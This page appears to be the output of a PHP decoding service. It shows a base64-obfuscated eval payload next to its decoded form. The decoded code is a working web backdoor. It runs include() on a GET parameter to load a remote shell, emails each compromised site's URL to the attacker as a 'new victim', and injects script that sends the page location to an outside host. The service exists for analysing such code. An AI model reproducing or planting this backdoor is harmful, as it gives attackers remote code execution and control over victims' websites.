Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(base64_decode('Ly8gQnkgTTNNMFJINFgNCi8vIGNvbnRhY3Q6bTNtMHJoNHhAZ21haWwuY29tDQppZiAodH..

Decoded Output download

// By M3M0RH4X
// contact:[email protected]
if (trim($_GET['x'])!='')
{
	@include($_GET['x']);exit();
}
$email = '[email protected],[email protected]';
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
@mail($email, 'Exploit By M3-X: '. $_SERVER['PHP_SELF'], 'Hey , this is a new victim\'s exploit: '. $y .' You can use (x=shell_url) at the end of the link ;) ', 'From: '. $email .' <'. $email .'>
');
echo "<SCRIPT>a=new/**/Image();a.src='http://infodoc.3x.ro/cr055/thd.php?thdz='+escape(location.href);</SCRIPT>";

Did this file decode correctly?

Original Code

eval(base64_decode('Ly8gQnkgTTNNMFJINFgNCi8vIGNvbnRhY3Q6bTNtMHJoNHhAZ21haWwuY29tDQppZiAodHJpbSgkX0dFVFsneCddKSE9JycpDQp7DQoJQGluY2x1ZGUoJF9HRVRbJ3gnXSk7ZXhpdCgpOw0KfQ0KJGVtYWlsID0gJ20zbTByaDR4QGdtYWlsLmNvbSxtM20wcmg0eEB5YWhvby5mcic7DQokeSA9ICdodHRwOi8vJyAuICRfU0VSVkVSWydIVFRQX0hPU1QnXSAuICRfU0VSVkVSWydSRVFVRVNUX1VSSSddOw0KQG1haWwoJGVtYWlsLCAnRXhwbG9pdCBCeSBNMy1YOiAnLiAkX1NFUlZFUlsnUEhQX1NFTEYnXSwgJ0hleSAsIHRoaXMgaXMgYSBuZXcgdmljdGltXCdzIGV4cGxvaXQ6ICcuICR5IC4nIFlvdSBjYW4gdXNlICh4PXNoZWxsX3VybCkgYXQgdGhlIGVuZCBvZiB0aGUgbGluayA7KSAnLCAnRnJvbTogJy4gJGVtYWlsIC4nIDwnLiAkZW1haWwgLic+XHJcbicpOw0KZWNobyAiPFNDUklQVD5hPW5ldy8qKi9JbWFnZSgpO2Euc3JjPSdodHRwOi8vaW5mb2RvYy4zeC5yby9jcjA1NS90aGQucGhwP3RoZHo9Jytlc2NhcGUobG9jYXRpb24uaHJlZik7PC9TQ1JJUFQ+Ijs=')); 

Function Calls

base64_decode 1

Variables

None

Stats

MD5 0b3ead6ac76df642b05bfef18bb95013
Eval Count 1
Decode Time 149 ms